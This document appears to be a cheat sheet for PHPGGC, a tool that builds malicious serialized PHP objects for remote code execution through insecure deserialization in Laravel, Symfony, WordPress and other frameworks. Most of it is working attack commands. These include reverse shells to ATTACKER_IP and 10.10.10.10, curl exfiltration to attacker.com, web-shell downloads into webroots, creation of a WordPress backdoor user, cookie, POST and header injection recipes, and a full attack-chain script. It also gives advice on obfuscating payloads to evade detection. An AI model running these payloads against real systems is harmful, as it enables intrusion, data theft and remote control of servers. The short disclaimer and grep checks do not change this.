PHPGGC

Overview

PHPGGC (PHP Generic Gadget Chains) is a tool for generating malicious serialized PHP objects that exploit insecure deserialization vulnerabilities. It leverages “gadget chains” from common PHP frameworks and libraries to achieve remote code execution (RCE) when vulnerable applications unserialize untrusted data.

Key Features:

• Pre-built gadget chains for popular PHP frameworks
• Automatic payload generation for common targets
• Support for multiple exploitation techniques
• Chain discovery and analysis
• Custom gadget chain creation
• Integration with exploitation frameworks

Installation

From GitHub

git clone https://github.com/ambionics/phpggc.git
cd phpggc

Verify Installation

./phpggc --version
./phpggc -l

Docker

docker run -it --rm ambionics/phpggc

Requirements

• PHP 7.0+ or 8.0+
• Composer (optional, for dependency management)

Basic Usage

List Available Gadget Chains

./phpggc -l
./phpggc -l | grep "Laravel"

Generate Simple Payload

./phpggc Laravel/RCE

Generate With Command

./phpggc Laravel/RCE system "whoami"

Specify Output Format

./phpggc -f json Laravel/RCE system "whoami"
./phpggc -f phtml Laravel/RCE system "whoami"

Core Commands

Command	Description
-l, --list	List all available gadget chains
-i, --info	Show detailed chain information
-c, --chains	Show chains for specific framework
-f, --format	Output format (raw, base64, json, phtml, etc.)
-s, --side-effect	Generate chain with side effects
--template	Use custom template for payload
--skip-vulnerabilities	Skip vulnerability checks
--verbose	Verbose output

Available Gadget Chains

Laravel Chains

# RCE via Laravel gadgets
./phpggc Laravel/RCE

# List all Laravel chains
./phpggc -l | grep -i laravel

Symfony Chains

# RCE via Symfony
./phpggc Symfony/RCE

# EventDispatcher exploitation
./phpggc -i Symfony/EventDispatcher

WordPress Chains

# WordPress plugin exploitation
./phpggc WordPress/RCE
./phpggc WordPress/Plugin

Zend Framework Chains

# Zend/Laminas exploitation
./phpggc Zend/RCE
./phpggc Laminas/RCE

Other Popular Frameworks

./phpggc Yii/RCE
./phpggc CakePHP/RCE
./phpggc Doctrine/RCE
./phpggc Magento/RCE

Output Formats

Raw Serialized Format

./phpggc -f raw Laravel/RCE system "whoami"

Base64 Encoded

./phpggc -f base64 Laravel/RCE system "whoami"

URL Encoded

./phpggc -f url Laravel/RCE system "whoami"

JSON Format

./phpggc -f json Laravel/RCE system "whoami"

PHTML (PHP file)

./phpggc -f phtml Laravel/RCE system "whoami" > payload.php
php payload.php

Exploitation Techniques

Remote Command Execution

# Execute system commands
./phpggc Laravel/RCE system "id"
./phpggc Laravel/RCE system "cat /etc/passwd"
./phpggc Laravel/RCE system "curl http://attacker.com"

Reverse Shell

# Generate reverse shell payload
./phpggc Laravel/RCE system "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

# Or with nc
./phpggc Laravel/RCE system "nc -e /bin/bash ATTACKER_IP 4444"

File Writing

# Write files via payload
./phpggc Laravel/RCE system "echo 'shell code' > /tmp/shell.php"

# More complex file operations
./phpggc Laravel/RCE system "wget http://attacker.com/shell.php -O /var/www/shell.php"

Data Exfiltration

# Extract sensitive data
./phpggc Laravel/RCE system "cat /var/www/config.php | base64"

# Curl exfiltration
./phpggc Laravel/RCE system "curl http://attacker.com/log.php?data=$(whoami)"

Chain Information and Analysis

Detailed Chain Information

# Get full details about a chain
./phpggc -i Laravel/RCE

# Show vulnerability details
./phpggc -i Symfony/RCE --verbose

List Chains by Framework

# All chains for a specific framework
./phpggc -l Laravel
./phpggc -l WordPress
./phpggc -l Symfony

Search for Specific Gadgets

# Find chains containing specific keywords
./phpggc -l | grep -i "file"
./phpggc -l | grep -i "execute"

Advanced Usage

Custom Templates

# Using custom template file
./phpggc -f raw --template custom.template Laravel/RCE system "whoami"

Side Effect Chains

# Chains with side effects (file write, etc.)
./phpggc -s Laravel/RCE system "whoami"

Chaining Multiple Commands

# Execute multiple commands
./phpggc Laravel/RCE system "id; whoami; pwd"

# Or use command separator
./phpggc Laravel/RCE system "cmd1 && cmd2 && cmd3"

Bypassing Filters

# Using alternative command syntax
./phpggc Laravel/RCE system "sh -c 'command'"

# Hex encoding commands
./phpggc Laravel/RCE system "echo 'x' | xxd -r -p"

Integration with Exploitation Workflows

Web Application Testing

# Generate payload for cookie injection
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")
curl -b "session=$PAYLOAD" http://target.com

# For POST parameter
curl -X POST http://target.com -d "data=$(./phpggc -f url Laravel/RCE system 'id')"

Automated Exploitation

# Generate payload and store in variable
PAYLOAD=$(./phpggc -f raw Laravel/RCE system "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1")

# Use in exploitation script
php -r "echo unserialize(base64_decode('$PAYLOAD'));"

Testing Multiple Frameworks

#!/bin/bash
# Test multiple framework vulnerabilities
COMMAND="id"
for framework in Laravel Symfony Yii WordPress; do
  echo "Testing $framework..."
  ./phpggc -f raw "$framework/RCE" system "$COMMAND"
done

Serialization and Injection Points

URL Parameter Injection

# Target URL with serialized parameter
curl "http://target.com/profile?data=$(./phpggc -f url Laravel/RCE system 'whoami')"

Cookie Injection

# Inject serialized payload into cookie
curl -b "session=$(./phpggc -f base64 Laravel/RCE system 'id')" http://target.com

POST Body Injection

# Inject into POST parameter
curl -X POST http://target.com \
  -d "profile=$(./phpggc -f url Laravel/RCE system 'whoami')"

Header Injection

# Inject into custom header
curl -H "X-Data: $(./phpggc -f base64 Laravel/RCE system 'id')" http://target.com

Real-World Exploitation Scenarios

Laravel Application RCE

# Step 1: Identify Laravel application
# Step 2: Find unserialize() call (typically in session handling)

# Step 3: Generate payload
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")

# Step 4: Inject into vulnerable endpoint
curl -b "PHPSESSID=$PAYLOAD" http://target-laravel.com

WordPress Plugin Exploitation

# Identify vulnerable WordPress plugin using gadget chains
./phpggc -i WordPress/RCE

# Generate exploitation payload
./phpggc -f raw WordPress/RCE system "wp_create_user attacker password123"

# Or modify WordPress files
./phpggc WordPress/RCE system "wget http://attacker.com/shell.php -O /var/www/wp-content/shell.php"

Symfony Application Attack

# Identify Symfony version and components
# Generate appropriate Symfony chain

./phpggc -l | grep Symfony
./phpggc -i Symfony/EventDispatcher

# Create payload targeting EventDispatcher
PAYLOAD=$(./phpggc -f base64 Symfony/RCE system "id")

Payload Encoding and Obfuscation

Base64 Encoding

# Generate base64-encoded payload
./phpggc -f base64 Laravel/RCE system "whoami" > payload.b64

# Decode and execute
cat payload.b64 | base64 -d | php

URL Encoding

# Generate URL-safe payload
./phpggc -f url Laravel/RCE system "whoami"

# Use in URL parameter
echo "http://target.com?data=$(./phpggc -f url Laravel/RCE system 'id')"

Hexadecimal Encoding

# Encode command to hex
echo -n "whoami" | xxd -p

# Use in payload
./phpggc Laravel/RCE system "echo '$(echo -n whoami | xxd -p)' | xxd -r -p"

Defensive Analysis

Identify Vulnerable Code Patterns

# Look for unserialize() in source code
grep -r "unserialize" /path/to/php/app

# Check for user input passing to unserialize
grep -r "unserialize(\$_" /path/to/php/app

Testing for Gadget Chain Exploitation

# Run test payload through application
PAYLOAD=$(./phpggc Laravel/RCE system "touch /tmp/test")

# Monitor for execution
tail -f /var/log/apache2/access.log

Version Detection

# Detect framework version for appropriate chains
curl -s http://target.com | grep -i "Laravel\|Symfony\|WordPress"

# Check composer.lock or package files
curl http://target.com/composer.lock 2>/dev/null | grep -i version

Practical Exploitation Workflow

Full Attack Chain

#!/bin/bash
TARGET="http://target.com"
FRAMEWORK="Laravel"

# Step 1: Identify vulnerability
echo "[+] Testing for deserialization vulnerabilities..."

# Step 2: Generate payload for RCE
COMMAND="bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"
PAYLOAD=$(./phpggc -f base64 "$FRAMEWORK/RCE" system "$COMMAND")

# Step 3: Deliver payload
echo "[+] Injecting payload..."
curl -b "session=$PAYLOAD" "$TARGET/dashboard"

# Step 4: Listener
# nc -lvnp 4444

Testing Multiple Injection Points

#!/bin/bash
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "id")

# Test different injection points
echo "Testing Cookie..."
curl -b "data=$PAYLOAD" http://target.com

echo "Testing POST..."
curl -X POST -d "input=$PAYLOAD" http://target.com

echo "Testing Header..."
curl -H "X-Custom: $PAYLOAD" http://target.com

Troubleshooting

Payload Not Executing

# Verify PHP version compatibility
php --version

# Test payload locally first
php -r "echo unserialize(base64_decode('PAYLOAD_HERE'));"

# Check target uses unserialize()
grep -r "unserialize" target_code/

Encoding Issues

# Test different output formats
./phpggc -f raw Laravel/RCE system "whoami"
./phpggc -f base64 Laravel/RCE system "whoami"
./phpggc -f json Laravel/RCE system "whoami"

Chain Not Found

# Update PHPGGC database
git pull
./phpggc -l --refresh

# Check if framework is supported
./phpggc -l | grep -i "framework_name"

Security Considerations

Safe Testing

• Only test on authorized systems
• Use isolated lab environments
• Document all testing activities
• Have rollback procedures ready

Payload Detection

• Avoid common payload patterns
• Use encoding/obfuscation
• Employ timing-based techniques
• Monitor system logs for detection

Version and Updates

# Check version
./phpggc --version

# Update gadget chains
cd phpggc && git pull origin master

Legal and Ethical Considerations

Critical: PHPGGC generates payloads for testing deserialization vulnerabilities only on systems where you have explicit authorization. Unauthorized exploitation is illegal. Always obtain written permission before conducting security assessments on any system.